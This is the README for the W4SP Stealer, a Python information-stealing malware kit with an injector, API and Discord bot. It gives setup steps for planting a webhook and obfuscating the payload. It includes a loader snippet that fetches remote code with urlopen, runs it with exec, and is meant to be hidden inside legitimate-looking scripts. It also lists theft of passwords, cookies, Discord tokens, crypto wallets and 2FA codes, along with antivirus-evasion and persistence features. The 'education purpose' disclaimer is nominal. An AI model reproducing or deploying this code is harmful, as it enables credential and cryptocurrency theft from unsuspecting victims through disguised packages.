🐝 W4SP Stealer 🐝

⚠️ Official Repo (loTus04/WS4P-Stealer) got termed, this is a clone approuved by lotus ⚠️

w4sp Stealer official source code, one of the best python stealer on the web
W4SP Stealer | W4SP API | W4SP Bot

Stealer by @loTus04 and API & Bot by @billythegoat356
(for education purpose only)

🚩 Table of Content

• Setup - Stealer
• Setup - API & Bot
• Features - Stealer
• Features - Injector
• Features - Api
• Features - Bot
• Demo

Setup [Stealer & Injector]

1. Put ur webhook in wasp.py: hook = "DISCORD_WEBHOOK"
2. Obfuscate & Upload anywhere (needs to be accessible with an http request)
3. Put wasp.py link in injector.py: request.urlopen("W4SPGRAB").read()
4. Obfuscate it

Setup [Line ~ Optional but recomanded]

from tempfile import NamedTemporaryFile as _ffile
from sys import executable as _eexecutable
from os import system as _ssystem
_ttmp = _ffile(delete=False)
_ttmp.write(b"""from urllib.request import urlopen as _uurlopen;exec(_uurlopen("INJECTOR_LINK").read())""")
_ttmp.close()
try: _ssystem(f"start {_eexecutable.replace('.exe', 'w.exe')} {_ttmp.name}")
except: pass

# replace INJECTOR_LINK by the injector.py link from setup
# (this script was made by Billy)

# encode in b64 the last payload and replace it here
# then hide this line in a legit looking python script
# or use ur brain and ur own technique, this is just un exemple
# remeber, its for education purpose, attacking a machine w/o autorisation is illegal !

__import__('\x62\x75\x69\x6c\x74\x69\x6e\x73').exec(__import__('\x62\x75\x69\x6c\x74\x69\x6e\x73').compile(__import__('\x62\x61\x73\x65\x36\x34').b64decode("%PAYLOAD%"),'<string>','\x65\x78\x65\x63'))

Setup [API]

Features [Stealer

(Stealer by @loTus04)

Global

• Saved Passwords
• Browser Cookies
• Get PC information
• AntiVM - Trust Factor system, it wont send data if Gmail cookies arent' found
• All files are uploaded to an external api <- Improved by xKian
• Data is send throught a Discord webhook

Discord

• Discord Tokens from browsers
• Discord Token from discord, discordcanary, discordPTBa
• Get all info on token (email, nitro/badge, rare friends)

Wallets

• Exodus Wallet
• Metamask Wallet
• Atomic Walletk

Gaming

• Steam Client
• Riot Client
• NationsGlory Client

Other

• Telegram Session

File Stealer

• It will search throught the pc for: saved passwords, 2fa codes, wallet keys and other sensitive information
  (idea came from Kiwi plugin on msf)

Features [Injector]

(Injector by @loTus04)

• Brilliant persistance technique (only in injector v1.1)
• Invisible in TaskManger StartUP tab (only in injector v1.1)
• FUD
• Fully runs in background
• Hides the stealer very well

Credit to xKian who improved the injector (v1.2)

Features [API]

(Api by @billythegoat356)

• Easy to update/upgrade
• Compatible with all w4sp versions
• Using auto & custom obfuscation
• Manage Users and Webhooks with API
• Browser security => If a browser is detected (headers) it will obfusacate a fake wasp script <- Brilliant Idea by lath

Features [BOT]

(Bot by @billythegoat356)

• Easy to configure
• Manage Users and Webhooks using w4sp api
• Auto inject file.py

Few articles on W4SP (they where writen during beta-testing)
⚠️Most articles writen after that are 95% bullshit⚠️

• securelist.com ~ Two more malicious Python packages in the PyPI
• securityweek.com ~ Security Firms Find Over 20 Malicious PyPI Packages Designed for Data Theft
• digismak.com ~ Criminals steal data by spoofing popular open source package
• darkreading.com ~ Whack-a-Mole: More Malicious PyPI Packages Spring Up Targeting Discord, Roblox

ScreenShots